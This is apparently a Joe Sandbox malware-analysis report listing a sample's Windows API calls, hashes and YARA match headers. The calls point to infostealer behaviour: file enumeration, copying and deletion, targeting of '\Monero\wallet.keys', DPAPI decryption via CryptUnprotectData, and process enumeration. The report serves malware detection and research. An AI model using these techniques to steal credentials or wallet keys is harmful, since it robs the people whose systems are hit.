                                • Instruction Fuzzy Hash: F3B111719001189BDB28EB64DC96FED7379FF54304F4085ADA50AD6292EF30AB49CB93
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D510C,?,?,?,008D51B4,?,?,00000000,?,00000000), ref: 008B1923
                                • StrCmpCA.SHLWAPI(?,008D525C), ref: 008B1973
                                • StrCmpCA.SHLWAPI(?,008D5304), ref: 008B1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008B1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 008B1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008B1E20
                                • FindClose.KERNEL32(000000FF), ref: 008B1E32
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 7fcddb9455ed95249b6db4baaf0a30afce39152392d91b59167760bdab627206
                                • Instruction ID: 4b56cc95dc90fc17b6a517d7b4d481c8e7c93b3f54b3dc830b84c4734de3fa50
                                • Opcode Fuzzy Hash: 7fcddb9455ed95249b6db4baaf0a30afce39152392d91b59167760bdab627206
                                • Instruction Fuzzy Hash: 3C12E97191011C9BCB19EB64DC96FEE7378FB54304F4041ADA51AE6191EF30AF89CBA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008D0C2E), ref: 008BDE5E
                                • StrCmpCA.SHLWAPI(?,008D14C8), ref: 008BDEAE
                                • StrCmpCA.SHLWAPI(?,008D14CC), ref: 008BDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BE3E0
                                • FindClose.KERNEL32(000000FF), ref: 008BE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 531abac5f152e28d1672d6fbc72ec997c2a2485f9632090e6b53f15d1b0e3b01
                                • Instruction ID: c8979fb2fe4f829a213ed16be274eaae8c4fedaa985aa3434ebb749db4e5ec5d
                                • Opcode Fuzzy Hash: 531abac5f152e28d1672d6fbc72ec997c2a2485f9632090e6b53f15d1b0e3b01
                                • Instruction Fuzzy Hash: 09F18E7181011C9BDB29EB64DC96FEE7338FF54304F4041ADA41AA2191EF34AF8ACE56
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D14B0,008D0C2A), ref: 008BDAEB
                                • StrCmpCA.SHLWAPI(?,008D14B4), ref: 008BDB33
                                • StrCmpCA.SHLWAPI(?,008D14B8), ref: 008BDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BDDCC
                                • FindClose.KERNEL32(000000FF), ref: 008BDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 1ecc9bed3ce6939093ce1505bd53df1e103c63e70c6832ada570b53de69bcce7
                                • Instruction ID: faf363dec4ba38ab3fb6155153964902fd142a977a9333f573fc326a72853c8c
                                • Opcode Fuzzy Hash: 1ecc9bed3ce6939093ce1505bd53df1e103c63e70c6832ada570b53de69bcce7
                                • Instruction Fuzzy Hash: DA910572900108A7CB18FBB4EC96EED777DFB94304F408668A95AD6141EE34DB09CB93
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,008D05AF), ref: 008C7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008C7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 008C7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008C7C62
                                • LocalFree.KERNEL32(00000000), ref: 008C7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: af0b9d060819c96f49ccfc0bbe3bb68f143ae4bde6af10f77e6664c682763e3c
                                • Instruction ID: 7a5bf86d955b3743d7fdc80259ffce8931edb5c888d0bfe15636545bd5f4f058
                                • Opcode Fuzzy Hash: af0b9d060819c96f49ccfc0bbe3bb68f143ae4bde6af10f77e6664c682763e3c
                                • Instruction Fuzzy Hash: 25415D7194021CABCB24DB94DC99FEEB774FF54704F204199E50AA2280DB74AF85CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'lo_$>-yo$B}o_$F|W}$k5u}$s{vk$w6`"
                                • API String ID: 0-49416624
                                • Opcode ID: 888e63cff54631441ad0658b443d64ee998da0919c9fb1ffe7169135d402c7b4
                                • Instruction ID: 3f8bb8c362145951a82c9ec94223e2557b808402c3472190287de4cc1661c441
                                • Opcode Fuzzy Hash: 888e63cff54631441ad0658b443d64ee998da0919c9fb1ffe7169135d402c7b4
                                • Instruction Fuzzy Hash: 9BB2F5F39082049FE3046F2DEC8566ABBE9EF94720F1A493DEAC4C7744E63598058797
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008D0D73), ref: 008BE4A2
                                • StrCmpCA.SHLWAPI(?,008D14F8), ref: 008BE4F2
                                • StrCmpCA.SHLWAPI(?,008D14FC), ref: 008BE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 56oj$6w~$@kf$YpSv$^Qil$DN;
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6??$FfW$^kNo$n`$rj}7
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008BC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008BC87C
                                • lstrcat.KERNEL32(?,008D0B46), ref: 008BC943
                                • lstrcat.KERNEL32(?,008D0B47), ref: 008BC957
                                • lstrcat.KERNEL32(?,008D0B4E), ref: 008BC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008B724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008B7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008B72A4
                                • LocalFree.KERNEL32(?), ref: 008B72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008C961E
                                • Process32First.KERNEL32(008D0ACA,00000128), ref: 008C9632
                                • Process32Next.KERNEL32(008D0ACA,00000128), ref: 008C9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 008C965C
                                • CloseHandle.KERNEL32(008D0ACA), ref: 008C967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @)L$GQ{}$O!]/$S$'s
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7|c$Dx$nFEg$qM/:
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *:z6$1O$:[~$=xY
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008D05B7), ref: 008C86CA
                                • Process32First.KERNEL32(?,00000128), ref: 008C86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 008C86F3
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • CloseHandle.KERNEL32(?), ref: 008C8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 3949afecd9351d26a82611da4b16d771cdace475595d98839df70bb0957b5cd7
                                • Instruction ID: 74d8782d8f804323ea751db1787970c03b9857973b2c4f1a16c413e32bd78263
                                • Opcode Fuzzy Hash: 3949afecd9351d26a82611da4b16d771cdace475595d98839df70bb0957b5cd7
                                • Instruction Fuzzy Hash: 43312C71901218EBCB28EB94DC45FEEB778FB55704F1041ADA50AE6290DB34AA45CFA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,008B5184,40000001,00000000,00000000,?,008B5184), ref: 008C8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 5ab00f4dbad43be1e6040bb1086522cfca86164d1a0602a61d43db772154f419
                                • Instruction ID: e08b82bb9c6121a7915961325abf053536a1c480ee38906ac91e08b0e9883a22
                                • Opcode Fuzzy Hash: 5ab00f4dbad43be1e6040bb1086522cfca86164d1a0602a61d43db772154f419
                                • Instruction Fuzzy Hash: 7511DFB0250208EBDB00CFA4E884FAA37B9FB89314F109458F919CB250DB75E842DB60
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                • LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 199ca6c94a1bc334dd0b975370bf8c525877568ce283042ad4b05667d162b09d
                                • Instruction ID: b641395d32620b88735eb9f551b91054d56d7dc876884be2d848b3bd8746ade5
                                • Opcode Fuzzy Hash: 199ca6c94a1bc334dd0b975370bf8c525877568ce283042ad4b05667d162b09d
                                • Instruction Fuzzy Hash: 0D11A4B4240308AFEB10CFA4DC95FAA77B5FB89710F208058FA199B390C7B5A901CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008D0E00,00000000,?), ref: 008C79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,008D0E00,00000000,?), ref: 008C79C4
                                • wsprintfA.USER32 ref: 008C79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 949b9a191c6ce68c5144d7511c079accfb62c5bae6228fafb1c2351883bb47ba
                                • Instruction ID: 5c3804cca728530cf5e8ce2f3a18ae71c9395c0e67d9ae78cec96f4a3e50c617
                                • Opcode Fuzzy Hash: 949b9a191c6ce68c5144d7511c079accfb62c5bae6228fafb1c2351883bb47ba
                                • Instruction Fuzzy Hash: 271115B2904218ABCB14DFC9DD45BBEB7F8FB48B11F10421AF605A2280E2795941CBB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007BDDD0,00000000,?,008D0E10,00000000,?,00000000,00000000), ref: 008C7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7A6A
